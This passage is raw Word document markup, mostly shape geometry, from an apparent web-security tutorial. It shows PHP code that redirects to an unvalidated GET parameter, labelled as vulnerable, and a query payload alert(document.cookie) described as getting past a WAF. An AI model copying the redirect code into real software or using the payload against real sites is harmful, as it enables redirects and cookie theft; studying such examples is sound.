                            <a:gd name="T31" fmla="*/ 204 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 208 180"/>
                            <a:gd name="T35" fmla="*/ 208 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 229 180"/>
                            <a:gd name="T39" fmla="*/ 22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7F1038" id="Freeform 184" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:9pt;width:2.45pt;height:2.45pt;z-index:1597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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,145415;13335,145415;11430,144780;0,132080;0,127635;13335,114300;17780,114300;31115,129540;31115,132080;17780,145415" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="14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26432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137160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="509270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="180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509270"/>
                          <a:chOff x="1614" y="216"/>
                          <a:chExt cx="8700" cy="802"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="181" name="Freeform 183"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="215"/>
                            <a:ext cx="8700" cy="802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1018 216"/>
                              <a:gd name="T3" fmla="*/ 1018 h 802"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1018 216"/>
                              <a:gd name="T7" fmla="*/ 1018 h 802"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1017 216"/>
                              <a:gd name="T11" fmla="*/ 1017 h 802"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 996 216"/>
                              <a:gd name="T15" fmla="*/ 996 h 802"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 993 216"/>
                              <a:gd name="T19" fmla="*/ 993 h 802"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 237 216"/>
                              <a:gd name="T23" fmla="*/ 237 h 802"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 216 216"/>
                              <a:gd name="T27" fmla="*/ 216 h 802"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 216 216"/>
                              <a:gd name="T31" fmla="*/ 216 h 802"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 237 216"/>
                              <a:gd name="T35" fmla="*/ 237 h 802"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 996 216"/>
                              <a:gd name="T39" fmla="*/ 996 h 802"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1017 216"/>
                              <a:gd name="T43" fmla="*/ 1017 h 802"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1018 216"/>
                              <a:gd name="T47" fmla="*/ 1018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802">
                                <a:moveTo>
                                  <a:pt x="8679" y="802"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="77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780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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15"/>
                            <a:ext cx="8700" cy="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...</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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header('Location: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'.$_GET['param']);</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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1" o:spid="_x0000_s2169" style="position:absolute;margin-left:80.7pt;margin-top:10.8pt;width:435pt;height:40.1pt;z-index:-15490048;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,216" coordsize="8700,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">
                <v:shape id="Freeform 183" o:spid="_x0000_s2170" style="position:absolute;left:1614;top:215;width:8700;height:802;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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UOcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/sfwix401RBKV2j6IroXgQf4HVoZtti&#10;M+kmsdZ/vxEEb/PxPWe26EwtWnK+sqxgNExAEOdWV1woOJ82gxSED8gaa8uk4EEeFvOP3gwzbe98&#10;oPYYChFD2GeooAyhyaT0eUkG/dA2xJH7tc5giNAVUju8x3BTy3GSTKXBimNDiQ19l5RfjzejQK7y&#10;depcNb6Z64/7m1z2u3ZLSvU/u+UXiEBdeItf7p2O89MRPJ+JF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4B1DnBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m8679,802l21,802r-3,-1l,780r,-3l,21,21,,8679,r21,21l8700,780r-18,21l8679,802xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1018;21,1018;18,1017;0,996;0,993;0,237;21,216;8679,216;8700,237;8700,996;8682,1017;8679,1018" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 182" o:spid="_x0000_s2171" type="#_x0000_t202" style="position:absolute;left:1614;top:215;width:8700;height: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pWcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgh7W1M9iFajiCgIC7K1HjyOzdgG&#10;m0ltotZ/v1lY8DaP9znzZWdr8aDWG8cKhoMEBHHhtOFSwTHffk1A+ICssXZMCl7kYbnofcwx1e7J&#10;GT0OoRQxhH2KCqoQmlRKX1Rk0Q9cQxy5i2sthgjbUuoWnzHc1nKUJGNp0XBsqLChdUXF9XC3ClYn&#10;zjbmtj//ZJfM5Pk04e/xVanPfreagQjUhbf4373Tcf5kBH/PxAv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TaVnBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=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...</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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header('Location:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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'.$_GET['param']);</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="159"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>well</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="14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26944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136525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="509270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="177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509270"/>
                          <a:chOff x="1614" y="215"/>
                          <a:chExt cx="8700" cy="802"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="178" name="Freeform 180"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="215"/>
                            <a:ext cx="8700" cy="802"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10293 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8700"/>
                              <a:gd name="T2" fmla="+- 0 1017 215"/>
                              <a:gd name="T3" fmla="*/ 1017 h 802"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1017 215"/>
                              <a:gd name="T7" fmla="*/ 1017 h 802"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1017 215"/>
                              <a:gd name="T11" fmla="*/ 1017 h 802"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 996 215"/>
                              <a:gd name="T15" fmla="*/ 996 h 802"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 993 215"/>
                              <a:gd name="T19" fmla="*/ 993 h 802"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 236 215"/>
                              <a:gd name="T23" fmla="*/ 236 h 802"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 215 215"/>
                              <a:gd name="T27" fmla="*/ 215 h 802"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 215 215"/>
                              <a:gd name="T31" fmla="*/ 215 h 802"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 236 215"/>
                              <a:gd name="T35" fmla="*/ 236 h 802"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 996 215"/>
                              <a:gd name="T39" fmla="*/ 996 h 802"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1017 215"/>
                              <a:gd name="T43" fmla="*/ 1017 h 802"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1017 215"/>
                              <a:gd name="T47" fmla="*/ 1017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00" h="802">
                                <a:moveTo>
                                  <a:pt x="8679" y="802"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="781"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="77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679" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8700" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8700" y="781"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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15"/>
                            <a:ext cx="8700" cy="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AC7743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AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr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..</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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header('Refresh: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7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0;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7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URL='.$_GET[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'param']);</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44"/>
                                <w:ind w:left="165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8" o:spid="_x0000_s2172" style="position:absolute;margin-left:80.7pt;margin-top:10.75pt;width:435pt;height:40.1pt;z-index:-15489536;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,215" coordsize="8700,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">
                <v:shape id="Freeform 180" o:spid="_x0000_s2173" style="position:absolute;left:1614;top:215;width:8700;height:802;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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4Ng8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCb3VToVaiq1SlVC+F2kKvQ3ZM&#10;gtnZuLvG+O+dg+BthvfmvW/my941qqMQa88GXkcZKOLC25pLA3+/ny9TUDEhW2w8k4ErRVguBk9z&#10;zK2/8A91+1QqCeGYo4EqpTbXOhYVOYwj3xKLdvDBYZI1lNoGvEi4a/Q4yybaYc3SUGFL64qK4/7s&#10;DOhVsZmGUI/P7rgLp7f/7233RcY8D/uPGahEfXqY79dbK/jvQivPyAR6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uDYPEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,802l21,802r-3,l,781r,-3l,21,21,,8679,r21,21l8700,781r-18,21l8679,802xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1017;21,1017;18,1017;0,996;0,993;0,236;21,215;8679,215;8700,236;8700,996;8682,1017;8679,1017" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 179" o:spid="_x0000_s2174" type="#_x0000_t202" style="position:absolute;left:1614;top:215;width:8700;height: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KLD8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflhG81Y0etEY3IkWhIJTG9NDjmJ0k&#10;i9nZmN1q+u/dQsHbPN7nrDeDbcWVem8cK5hOEhDEpdOGawVfxf7lFYQPyBpbx6TglzxssuenNaba&#10;3Tin6zHUIoawT1FBE0KXSunLhiz6ieuII1e53mKIsK+l7vEWw20rZ0kylxYNx4YGO3prqDwff6yC&#10;7TfnO3P5OH3mVW6KYpnwYX5WajwatisQgYbwEP+733Wcv1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KLD8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743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AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr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..</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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header('Refresh:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="47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0;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="47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URL='.$_GET[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'param']);</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44"/>
                          <w:ind w:left="165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5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="464"/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15972864" behindDoc="0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114300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="176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29 180"/>
                            <a:gd name="T3" fmla="*/ 229 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 229 180"/>
                            <a:gd name="T7" fmla="*/ 229 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 228 180"/>
                            <a:gd name="T11" fmla="*/ 228 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 208 180"/>
                            <a:gd name="T15" fmla="*/ 208 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 201 180"/>
                            <a:gd name="T19" fmla="*/ 201 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 180 180"/>
                            <a:gd name="T23" fmla="*/ 180 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 180 180"/>
                            <a:gd name="T27" fmla="*/ 180 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 204 180"/>
                            <a:gd name="T31" fmla="*/ 204 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 208 180"/>
                            <a:gd name="T35" fmla="*/ 208 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 229 180"/>
                            <a:gd name="T39" fmla="*/ 22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AE178" id="Freeform 177" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:9pt;width:2.45pt;height:2.45pt;z-index:159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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,145415;13335,145415;11430,144780;0,132080;0,127635;13335,114300;17780,114300;31115,129540;31115,132080;17780,145415" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request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pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/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2745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152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2345690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="173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5690" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="3694" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="174" name="Freeform 176"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="3694" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5287 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3694"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3694"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3694"/>
                              <a:gd name="T10" fmla="+- 0 421 240"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3694"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3694"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3694"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3694"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5287 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3694"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5308 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3694"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5308 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3694"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5290 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3694"/>
                              <a:gd name="T42" fmla="+- 0 421 240"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5287 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3694"/>
                              <a:gd name="T46" fmla="+- 0 422 240"/>
                              <a:gd name="T47" fmla="*/ 4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694" h="183">
                                <a:moveTo>
                                  <a:pt x="367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673" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3676" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367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39"/>
                            <a:ext cx="369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/?param=&lt;javascript:alert(document.cookie&gt;)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4" o:spid="_x0000_s2175" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:184.7pt;height:9.15pt;z-index:-15489024;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="369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">
                <v:shape id="Freeform 176" o:spid="_x0000_s2176" style="position:absolute;left:1614;top:239;width:3694;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="369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lpQsMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBDF74LfIYzgTVNFXK1GEaHrelz/nYdmbIvN&#10;pDbZWvfTm4UFbzO8937zZrluTSkaql1hWcFoGIEgTq0uOFNwOiaDGQjnkTWWlknBkxysV93OEmNt&#10;H/xNzcFnIkDYxagg976KpXRpTgbd0FbEQbva2qAPa51JXeMjwE0px1E0lQYLDhdyrGibU3o7/JhA&#10;2SWn/X2afN6aC43vv+e58XOtVL/XbhYgPLX+bf5Pf+lQ/2MCf8+ECeTq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llpQsMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m3673,182l21,182r-3,-1l,161r,-3l,21,21,,3673,r21,21l3694,161r-18,20l3673,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3673,422;21,422;18,421;0,401;0,398;0,261;21,240;3673,240;3694,261;3694,401;3676,421;3673,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 175" o:spid="_x0000_s2177" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:369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BC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BCs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/?param=&lt;javascript:alert(document.cookie&gt;)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8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="464"/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15973376" behindDoc="0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114300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="172" name="Freeform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29 180"/>
                            <a:gd name="T3" fmla="*/ 229 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 229 180"/>
                            <a:gd name="T7" fmla="*/ 229 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 228 180"/>
                            <a:gd name="T11" fmla="*/ 228 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 208 180"/>
                            <a:gd name="T15" fmla="*/ 208 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 201 180"/>
                            <a:gd name="T19" fmla="*/ 201 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 180 180"/>
                            <a:gd name="T23" fmla="*/ 180 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 180 180"/>
                            <a:gd name="T27" fmla="*/ 180 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 204 180"/>
